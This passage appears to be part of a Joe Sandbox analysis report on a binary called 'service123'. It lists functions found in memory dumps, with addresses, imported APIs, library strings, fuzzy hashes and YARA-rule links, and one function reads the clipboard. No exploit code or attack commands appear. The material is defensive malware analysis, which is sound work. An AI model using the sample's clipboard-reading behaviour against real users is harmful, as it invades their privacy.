API String ID: 3108337309-1359127009
Opcode ID: 67511538ac732cfe7e4c6ced7e6efb7be29ffb22a1217451a1b741366cd5dde9
Instruction ID: a20a3533d53ae23fec2e9c4e587a419851d0b772d8771179e5ffd6a56a4c12a5
Opcode Fuzzy Hash: 67511538ac732cfe7e4c6ced7e6efb7be29ffb22a1217451a1b741366cd5dde9
Instruction Fuzzy Hash: 0F4104F62193414BE324AE3D958132A7AA6BB4031CF20493EC881ABF51E73AD554CF37

Function 6C2FEE50 Relevance: 12.5, APIs: 8, Instructions: 494COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2FF18B
malloc.MSVCRT ref: 6C2FF1A8

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 86eb52e9a939aa9d126713c99f288f2cf72b2b5e276bb1a4210ef22bf4c8ec45
Instruction ID: 292cab1bc147db3dc7841c3af00cbb0bf643d79b5c3fbead5786849a39419efc
Opcode Fuzzy Hash: 86eb52e9a939aa9d126713c99f288f2cf72b2b5e276bb1a4210ef22bf4c8ec45
Instruction Fuzzy Hash: 65124B7564870E8FD311CF18C08061BF7E2BF88718F558A2DE8A997B54D770E90ACB92

Function 6C31E490 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 219stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C31E4BA
strlen.MSVCRT ref: 6C31E52A

Strings

basic_string: construction from null is not valid, xrefs: 6C31E4F2, 6C31E562, 6C31E5D2
basic_string: construction from null is not valid, xrefs: 6C31E61F, 6C31E670, 6C31E6C0

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: 6ba57b55590785a72ac989326f07436ea7cc5a291f46302b326f819e42d2ae40
Instruction ID: 27bf6f59cde691669ce438e734482f514889977936f44d96fd8f774c386ac708
Opcode Fuzzy Hash: 6ba57b55590785a72ac989326f07436ea7cc5a291f46302b326f819e42d2ae40
Instruction Fuzzy Hash: 396151F2A097148FCB04AF2CD48545ABBE4BB55618F06496DE8C48BB15E232E859CF93

Function 6C310610 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C310636
memcmp.MSVCRT ref: 6C310659
memcmp.MSVCRT ref: 6C3106CF
memcmp.MSVCRT ref: 6C310741

Part of subcall function 6C3BAB60: strlen.MSVCRT ref: 6C3BAB6E

memcmp.MSVCRT ref: 6C3107D5

Strings

basic_string::compare, xrefs: 6C310678, 6C3106EC, 6C31075F, 6C3107F4, 6C310810
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C310680, 6C3106F4, 6C310767, 6C3107FC, 6C310818

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 841ac28f83051af08ea66f3e52e5ee9db986858be5525bb6febe00b213285ce0
Instruction ID: 21dd4428112fda9ce930fc522912fce61da38394984e0ef5e38e853ac1e41f20
Opcode Fuzzy Hash: 841ac28f83051af08ea66f3e52e5ee9db986858be5525bb6febe00b213285ce0
Instruction Fuzzy Hash: 7861237670A7049FC304AF69C88085EFBE5ABD8B98F54892DE8C887B20D631D854CF53

Function 6C309B99 Relevance: 10.6, APIs: 7, Instructions: 81clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 6C309BA0
GetClipboardData.USER32 ref: 6C309BE7
GlobalLock.KERNEL32 ref: 6C309BF9
GlobalUnlock.KERNEL32 ref: 6C309C1A
CloseClipboard.USER32 ref: 6C309C23

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: f2d64612c69bf8c7d30ada045e9113f6656b51885eb3513064ed64642c369aec
Instruction ID: 70c13b30510dddaf96b7391352e1c886d6d81a124924909fe4285ffe2c08ec93
Opcode Fuzzy Hash: f2d64612c69bf8c7d30ada045e9113f6656b51885eb3513064ed64642c369aec
Instruction Fuzzy Hash: 992153B6B083008FDB00FF7CD54926E7BF0AB55224F444A68D8D687A84EB36D5488F93

Function 6C3070C0 Relevance: 9.6, APIs: 6, Instructions: 649COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C3070C7
memset.MSVCRT ref: 6C307217

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: localeconvmemset
String ID:
API String ID: 2367598729-0
Opcode ID: f81cfe452b253c3cee901cfc436a39abdaa96596897aea0aa2f92eae53fa3966
Instruction ID: b0d03df95c16aa40a106d2a7d4e0ceb1c207b13937d2793c039611a135b7c3ae
Opcode Fuzzy Hash: f81cfe452b253c3cee901cfc436a39abdaa96596897aea0aa2f92eae53fa3966
Instruction Fuzzy Hash: 0842B0727093158FD700CF29C48075ABBE2BF86308F15896DE8958BB81D776E949CF92

Function 6C305880 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 6C306D95
, xrefs: 6C307074
NaN, xrefs: 6C305B5F
Infinity, xrefs: 6C305BE0

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: d11a60e9d4fd92ef719152553bf63664bbfa27bfea4d861a6903599a9902d3e5
Instruction ID: 20d20ee5a2b6cdca0a4f39b2de454c86bb5dd226b0a55400563766335a6236d5
Opcode Fuzzy Hash: d11a60e9d4fd92ef719152553bf63664bbfa27bfea4d861a6903599a9902d3e5
Instruction Fuzzy Hash: 54E22FB2A097418FD310DF29C18074ABBF0BF89758F14891EE8D997755E776E8848F82

Function 005351B0 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 005369A4
, xrefs: 005366C5

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 7ec4bb12ea415fa04f067cfb706ca2f5d0f790de424756e47ad9c04f9794e933
Instruction ID: 5c39d987283e079a8c0efa90f09b32639cbb67fd88efb15c78e081bc3c23d117
Opcode Fuzzy Hash: 7ec4bb12ea415fa04f067cfb706ca2f5d0f790de424756e47ad9c04f9794e933
Instruction Fuzzy Hash: 6FE220B1A087829FD720DF29C18475AFBE0BF88744F258D1DE89997361E775E8448F82

Function 00533E20 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

., xrefs: 00534114
gfff, xrefs: 00533F43
gfff, xrefs: 00533F2C
@, xrefs: 00533FD9

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction ID: a3032b743be4865a31864092a55d2c681096b8b2a52bf9c6725f28d3b439e7bd
Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction Fuzzy Hash: 7CD19E71A087068BD714DE28C88431BBFE2BFD4344F18C92DE8999B355E774ED489B92

Function 6C3044F0 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

@, xrefs: 6C3046A9
., xrefs: 6C3047E4
gfff, xrefs: 6C3045FC
gfff, xrefs: 6C304613

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction ID: 141bd58eac0edfb1b174e63eb536549a82752a01ec4cb5582bf858fca32d1162
Opcode Fuzzy Hash: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction Fuzzy Hash: 60D1D272B083058BD700DE29C58034BB7E2AFD5748F19C92DE8948BB55E772DA49CF92

Function 6C392EF0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 6C393000

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: 7364415c03922042855c10aa33a8a418bcad52a91fe10379ad3be48852a9fe5b
Instruction ID: 1fbe82c807888ba4187b736f38e2b5d0f0161cc6a483891587bc0e81b2409f83
Opcode Fuzzy Hash: 7364415c03922042855c10aa33a8a418bcad52a91fe10379ad3be48852a9fe5b
Instruction Fuzzy Hash: DE4188B2A097108FC714DF29D58065AFBE4AF89314F15896EE8998B319E331D845CFA2

Function 6C3904E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C390550
memset.MSVCRT ref: 6C390574

Strings

basic_string::_M_replace_aux, xrefs: 6C3905F0

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memmovememset
String ID: basic_string::_M_replace_aux
API String ID: 1288253900-2536181960
Opcode ID: cf244370a90288e5727bca4476ef9f98345a6d45b8f3506062c2d8bf23b51f5e
Instruction ID: 09ae19187e7a0d1f9eaea1c1c97eb266cd78daf53c208b211bab680a1ad9d605
Opcode Fuzzy Hash: cf244370a90288e5727bca4476ef9f98345a6d45b8f3506062c2d8bf23b51f5e
Instruction Fuzzy Hash: 9D316E7560D7908FC7059F6CC4C062ABBF1AF8A204F14896DE8A88B715E732D844CF53

Function 6C3635F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C363648
memcpy.MSVCRT ref: 6C3636C1

Part of subcall function 6C365340: memcpy.MSVCRT ref: 6C3653D0

Strings

basic_string::_M_replace_aux, xrefs: 6C363670

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy$memset
String ID: basic_string::_M_replace_aux
API String ID: 438689982-2536181960
Opcode ID: 78b077c4dd1d66e916cf4f89079a1345d33016f8fd0e88374784fa4fc9868866
Instruction ID: ce2f6c1f84b1ad403e6f5fcf670aabad8c679ad89b37846b8458123f364394f0
Opcode Fuzzy Hash: 78b077c4dd1d66e916cf4f89079a1345d33016f8fd0e88374784fa4fc9868866
Instruction Fuzzy Hash: 0B215C72A0A3149FC300AF1D988456FFBE4EB85668F944A6EE88897716D331D854CB93

Function 6C31A790 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C31A7AD
wcslen.MSVCRT ref: 6C31A7FD

Strings

basic_string: construction from null is not valid, xrefs: 6C31A7D0, 6C31A820

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 002cf86b7fda239b3f77c2b7a981168627a73ebdc9b4fe9e4451e0d2da08415c
Instruction ID: ae13a0ff82275052ee58ffc0fe55962f258ca9ce12caece7c087750c73fea77b
Opcode Fuzzy Hash: 002cf86b7fda239b3f77c2b7a981168627a73ebdc9b4fe9e4451e0d2da08415c
Instruction Fuzzy Hash: AB1163B2A153148FCB01AF6CD48086ABBF4BF45614F02086DE8C49B711D232D959CF93

Function 6C31A3A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C31A3BD
wcslen.MSVCRT ref: 6C31A40D

Strings

basic_string: construction from null is not valid, xrefs: 6C31A3E0, 6C31A430

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 002cf86b7fda239b3f77c2b7a981168627a73ebdc9b4fe9e4451e0d2da08415c
Instruction ID: 65d9c15742d33a1ba24f20a996d16948292c9940487a3903eaa53431470dc822
Opcode Fuzzy Hash: 002cf86b7fda239b3f77c2b7a981168627a73ebdc9b4fe9e4451e0d2da08415c
Instruction Fuzzy Hash: C41163B2A153148FCB00AF2CD48085ABBF4FF45618F42096DE8C49B311D632D959CF93

Function 6C3296A0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1123COMMON

Download Yara Rule

Strings

-, xrefs: 6C32A0BE

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 45a2c84e753bc9b7e5440d67701001cf13d0b89dce79488ee7ecc09c8959d5b9
Instruction ID: c3ffaba247868362cec51b81416dce65eecda05d06d83bad431f6af9bf878e1a
Opcode Fuzzy Hash: 45a2c84e753bc9b7e5440d67701001cf13d0b89dce79488ee7ecc09c8959d5b9
Instruction Fuzzy Hash: 44A27B70A043558FDF10CF69C48478DBBF2AF46328F288668D869AB692D739DC45CF91

Function 6C328570 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1122COMMON

Download Yara Rule

Strings

-, xrefs: 6C328F8E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: c562257d8b02a971df5a8aad112a2e8b89c69d47c191ad07ec920c8c49030623
Instruction ID: b50d5257b3bc7e119149e6b9f793b53405d8cbae515b90efb95406d96cf03225
Opcode Fuzzy Hash: c562257d8b02a971df5a8aad112a2e8b89c69d47c191ad07ec920c8c49030623
Instruction Fuzzy Hash: 1DA29E72A043588FDF10CF68C48478DBBB2BF45328F288659D865AB692C739DC45CF92

Function 6C363440 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 6C3634C0

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: basic_string::_S_construct null not valid
API String ID: 0-290684606
Opcode ID: fa3f1ea25a07a6d6570a8b5d2b16dd3fcf0e119051a8a5eed62695f3872ef457
Instruction ID: 9fe9550c7d6e812e8b438b3be8c02daa8ac7939ad2feccbb70e75bd358a08a1b
Opcode Fuzzy Hash: fa3f1ea25a07a6d6570a8b5d2b16dd3fcf0e119051a8a5eed62695f3872ef457
Instruction Fuzzy Hash: 57015AB160A3409BC3426F6B848561BFFF8AF92258F94886DE5C947B19C736D4488F62

Function 6C31A720 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C31A73D

Strings

basic_string: construction from null is not valid, xrefs: 6C31A760

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 7340dc9e915b5a85e54cf5f335c29d2f5d7910e82602f8e78e3bab805aabb1a6
Instruction ID: 3cf250828808231bcd9268317deea22fbca6e900af0774186f58194c0a5b617b
Opcode Fuzzy Hash: 7340dc9e915b5a85e54cf5f335c29d2f5d7910e82602f8e78e3bab805aabb1a6
Instruction Fuzzy Hash: 57F03AB6A153148FCB00EF6CC48085AB7F4BB45618F0248ADE8C89B711E232E949CF92

Function 6C31A330 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C31A34D

Strings

basic_string: construction from null is not valid, xrefs: 6C31A370

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
